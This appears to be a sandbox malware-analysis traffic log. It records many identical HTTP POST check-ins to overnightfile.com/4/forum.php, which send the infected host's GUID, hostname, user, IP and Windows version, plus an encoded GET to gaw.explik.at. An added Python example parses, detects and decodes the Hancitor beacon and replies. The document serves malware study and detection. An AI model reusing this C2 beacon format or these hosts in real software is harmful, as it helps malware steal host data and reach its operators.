                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:21.548600912 CEST919INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:21 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZYBAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:21.869719982 CEST920OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:21.966259003 CEST | 920 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4a 59 42 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cJYBQARRABw==0
Jul 14, 2020 11:22:22.263708115 CEST | 921 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:22.359987974 CEST | 921 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 47 51 4a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cGQJTARRABw==0
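The POST /4/forum.php exchange above, taken apart as an added example that is not part of the report: it transcribes the request and reply bytes from the report's Data Raw hex columns (the hex carries the real hostname that the ASCII column shows anonymised as computer\user), splits the check-in into its fields, checks the body against the Content-Length the client declared, then de-chunks and base64-decodes the reply. The single-byte XOR key 0x7A applied in the last step is taken from public Hancitor analyses, not from this report, and is an assumption of the example; under that key the constant tail ARRABw== shared by every reply on this page comes out as the four ASCII characters {n:}, while the three leading bytes differ per reply and are left uninterpreted here.

```python
import base64
from typing import Optional, Tuple

# Request and reply bodies of the first POST /4/forum.php exchange above,
# transcribed from the report's "Data Raw" hex (constructed input for this
# example; the report's ASCII column anonymises the hostname\user part).
BEACON_BODY_HEX = (
    "47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 "
    "26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 "
    "26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 "
    "44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e "
    "26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 "
    "26 54 59 50 45 3d 31 "
    "26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29"
)
RESPONSE_BODY_HEX = "63 0d 0a 4a 59 42 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a"
DECLARED_CONTENT_LENGTH = 111  # Content-Length header sent with that request

# Single-byte XOR key reported in public Hancitor analyses. This is an
# assumption of the example: the report does not state how replies are encoded.
ASSUMED_XOR_KEY = 0x7A

# Field order of the check-in, as seen in every POST body on this page.
CHECKIN_FIELDS = ("GUID", "BUILD", "INFO", "IP", "TYPE", "WIN")


def hex_dump_to_bytes(dump: str) -> bytes:
    """Turn a space-separated hex dump into bytes (fromhex skips whitespace)."""
    return bytes.fromhex(dump)


def parse_checkin(body: bytes) -> dict:
    """Split the form-encoded check-in into an ordered key/value dict.

    The body is sent without URL-escaping (the backslash and the spaces in
    INFO are literal), so a plain split is more faithful than urllib's parser.
    """
    fields = {}
    for pair in body.decode("latin-1").split("&"):
        key, _, value = pair.partition("=")
        fields[key] = value
    return fields


def is_hancitor_checkin(body: bytes, declared_length: Optional[int] = None) -> bool:
    """Detection rule: exactly the six observed fields, in order, and a body
    whose size matches the Content-Length the client declared."""
    if declared_length is not None and len(body) != declared_length:
        return False
    return tuple(parse_checkin(body)) == CHECKIN_FIELDS


def dechunk(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: <hex size>CRLF<data>CRLF ... 0CRLFCRLF."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # drop any chunk extension
        pos = eol + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2  # step over the CRLF that terminates the chunk data


def decode_reply(body: bytes, xor_key: int = ASSUMED_XOR_KEY) -> Tuple[bytes, bytes]:
    """Return (base64-decoded reply, the same bytes XORed with xor_key)."""
    raw = base64.b64decode(dechunk(body), validate=True)
    return raw, bytes(b ^ xor_key for b in raw)


if __name__ == "__main__":
    body = hex_dump_to_bytes(BEACON_BODY_HEX)
    print("check-in fields:", parse_checkin(body))
    print("matches rule:", is_hancitor_checkin(body, DECLARED_CONTENT_LENGTH))
    raw, plain = decode_reply(hex_dump_to_bytes(RESPONSE_BODY_HEX))
    print("reply base64-decoded:", raw.hex())
    print("reply after XOR 0x7A:", plain)
```

The six-field check on the body shape is a stricter match than a URL or User-Agent string alone: the path /4/forum.php and the Trident/7.0 UA both appear in ordinary traffic, whereas a form body whose keys are exactly GUID, BUILD, INFO, IP, TYPE, WIN in that order does not.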


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7192.168.1.102497178.208.80.22680C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Jul 14, 2020 11:22:06.369544029 CEST | 894 | OUT | GET /webstore/Wn2lrwDcfADSyX9Xa/bQ9IeTtb06T_/2Fyc5Du3a5C/Lbn9mkIxBLN4KS/0RiYslQln2uSb526_2FZm/fNkDBZePuZrATiQn/27jcpwDh1RA4upt/WsONFtTjnt3E_2FciB/BuyJhj2lU/e7KhPQjbhtvsi_2BPEBm/dqg6KCxr123lryjC_2B/rsW0LaJL29JZD0HTL3n3by/0dLhDac4FZAm6/Cll4ZY31/36smpDyOWwQEQIQyBeyPrxB/AWWgeCY_2F/D0kB9OWlNSI7FBMD_/0A_0D0wKzQLR/qdmLCTbzmUv/6Bzg_2F16y0cMp/8eIeLRZDfPXuShbQ/W HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gaw.explik.at
Connection: Keep-Alive
Jul 14, 2020 11:22:06.625502110 CEST | 895 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 14 Jul 2020 09:22:06 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      8192.168.1.1024971991.218.231.22680C:\Windows\SysWOW64\svchost.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Jul 14, 2020 11:22:22.764802933 CEST922OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:22.866281986 CEST922INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:22 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 4e 4d 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKNMPARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:23.183684111 CEST923OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:23.288708925 CEST923INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:22 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZNMAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:23.594024897 CEST923OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:23.701631069 CEST924INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:23 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 54 47 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVTGEARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:24.007934093 CEST924OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:24.110548973 CEST925INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:23 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 51 4a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKQJPARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:24.408555984 CEST925OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:24.502304077 CEST925INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:24 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 42 59 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVBYEARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:24.818351030 CEST926OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:24.910289049 CEST926INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:24 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNHSMARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:25.244096041 CEST927OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:25.340518951 CEST927INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:24 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZKPAARRABw==0
Jul 14, 2020 11:22:25.688595057 CEST | 927 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:25.783973932 CEST | 928 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:25 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVZAEARRABw==0
Jul 14, 2020 11:22:26.096357107 CEST | 928 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:26.191376925 CEST | 928 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:25 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 4b 50 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBKPYARRABw==0
Jul 14, 2020 11:22:26.510360956 CEST | 929 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:26.605473042 CEST | 929 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:26 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 42 59 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTBYGARRABw==0
Jul 14, 2020 11:22:26.888808012 CEST | 929 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:26.980513096 CEST | 930 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:26 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 42 59 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVBYEARRABw==0
Jul 14, 2020 11:22:27.289052010 CEST | 930 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
